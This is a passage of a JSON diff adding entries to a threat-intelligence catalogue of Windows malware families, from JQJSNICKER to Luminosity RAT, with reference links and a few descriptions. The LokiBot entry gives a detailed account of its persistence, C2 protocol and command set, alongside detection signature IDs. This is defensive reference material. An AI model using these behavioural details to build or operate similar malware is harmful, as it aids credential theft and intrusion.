"https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", + "http://marcmaiffret.com/vault7/" + ] + }, + "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", + "value": "JQJSNICKER", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", + "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + ] + }, + "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", + "value": "JripBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", + "value": "KAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", + "value": "Karagany", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", + "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", + "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" + ] + }, + "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", + "value": "Kardon Loader", + "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", + "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", + "https://research.checkpoint.com/banking-trojans-development/" + ] + }, + "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", + "value": "Karius", + "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" + ] + }, + "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", + "value": "KasperAgent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", + "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + ] + }, + "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", + "value": "Kazuar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" + ] + }, + "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", + "value": "Kegotip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", + "https://en.wikipedia.org/wiki/Kelihos_botnet" + ] + }, + "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", + "value": "Kelihos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSSL" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://citizenlab.ca/2016/11/parliament-keyboy/", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" + ] + }, + "uuid": "28c13455-7f95-40a5-9568-1e8732503507", + "value": "KeyBoy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://twitter.com/smoothimpact/status/773631684038107136", + "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" + ] + }, + "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", + "value": "APT3 Keylogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" + ] + }, + "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", + "value": "KEYMARBLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", + "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" + ] + }, + "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", + "value": "KHRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", + "https://www.group-ib.com/resources/threat-research/silence.html" + ] + }, + "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", + "value": "Kikothac", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" + ] + }, + "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", + "value": "KillDisk", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasper Internet Non-Security", + "Maple" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", + "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", + "https://github.com/nyx0/KINS", + "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", + "https://www.youtube.com/watch?v=C-dEOt0GzSE" + ] + }, + "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", + "value": "KINS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.morphick.com/resources/news/klrd-keylogger" + ] + }, + "uuid": "70459959-5a20-482e-b714-2733f5ff310e", + "value": "KLRD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/zerosum0x0/koadic" + ] + }, + "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", + "value": "Koadic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", + "https://twitter.com/struppigel/status/812726545173401600" + ] + }, + "uuid": "f7674d06-450a-4150-9180-afef94cce53c", + "value": "KokoKrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", + "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", + "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", + "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" + ] + }, + "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", + "value": "Konni", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" + ] + }, + "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", + "value": "KoobFace", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bisonal" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", + "https://securitykitten.github.io/2014/11/25/curious-korlia.html", + "https://camal.coseinc.com/publish/2013Bisonal.pdf", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", + "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", + "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" + ] + }, + "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", + "value": "Korlia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", + "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", + "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", + "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" + ] + }, + "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", + "value": "Kovter", + "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", + "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" + ] + }, + "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", + "value": "KPOT Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BlackMoon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", + "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", + "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", + "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", + "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" + ] + }, + "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", + "value": "KrBanker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", + "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" + ] + }, + "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", + "value": "KrDownloader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Osiris" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", + "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", + "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", + "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", + "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", + "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", + "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", + "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" + ] + }, + "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", + "value": "Kronos", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Barys", + "Gofot", + "Kuaibpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" + ] + }, + "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", + "value": "Kuaibu", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" + ] + }, + "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", + "value": "Kuluoz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", + "value": "Kurton", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", + "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" + ] + }, + "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", + "value": "Kwampirs", + "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", + "http://adelmas.com/blog/longhorn.php", + "https://www.youtube.com/watch?v=jeLd-gw2bWo" + ] + }, + "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", + "value": "Lambert", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", + "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" + ] + }, + "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", + "value": "Lamdelin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", + "http://malware-traffic-analysis.net/2017/04/25/index.html", + "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", + "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", + "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", + "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" + ] + }, + "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", + "value": "LatentBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", + "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", + "https://twitter.com/PhysicalDrive0/status/828915536268492800", + "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", + "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" + ] + }, + "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", + "value": "Lazarus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", + "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", + "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" + ] + }, + "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", + "value": "Laziok", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + ] + }, + "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", + "value": "Leash", + "description": "" + }, + { + "meta": { + "synonyms": [ + "shoco" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", + "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", + "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" + ] + }, + "uuid": "41da41aa-0729-428a-8b82-636600f8e230", + "value": "Leouncia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", + "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", + "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", + "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", + "http://www.malware-traffic-analysis.net/2017/11/02/index.html" + ] + }, + "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", + "value": "Lethic", + "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" + ] + }, + "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", + "value": "Limitail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", + "value": "Listrix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", + "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", + "https://github.com/zettabithf/LiteHTTP" + ] + }, + "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", + "value": "LiteHTTP", + "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", + "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", + "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", + "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", + "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", + "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", + "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" + ] + }, + "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", + "value": "Locky", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" + ] + }, + "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", + "value": "Locky (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" + ] + }, + "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", + "value": "Locky Loader", + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", + "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", + "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", + "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" + ] + }, + "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", + "value": "LockPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nymeria" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", + "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", + "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" + ] + }, + "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", + "value": "Loda", + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", + "value": "Logedrut", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", + "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" + ] + }, + "uuid": "2789b246-d762-4d38-8cc8-302293e314da", + "value": "LogPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", + "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", + "https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/", + "https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/", + "https://github.com/R3MRUM/loki-parse", + "http://www.malware-traffic-analysis.net/2017/06/12/index.html", + "http://blog.fernandodominguez.me/lokis-antis-analysis/", + "https://phishme.com/loki-bot-malware/", + "https://www.lastline.com/blog/password-stealing-malware-loki-bot/", + "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", + "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", + "value": "Loki Password Stealer (PWS)", + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of \u2018-u\u2019 that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: \u201cB7E1C2CC98066B250DDB2123\u201c.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: \u201c%APPDATA%\\ C98066\\\u201d.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: \u201c.exe,\u201d \u201c.lck,\u201d \u201c.hdb\u201d and \u201c.kdb.\u201d They will be named after characters 13 thru 18 of the Mutex. For example: \u201c6B250D.\u201d Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically \u201cckav.ru\u201d. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot\u2019s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luminosity_rat", + "https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/", + "https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark", + "https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/", + "http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html", + "https://krebsonsecurity.com/2018/07/luminositylink-rat-author-pleads-guilty/" + ] + }, + "uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a", + "value": "Luminosity RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 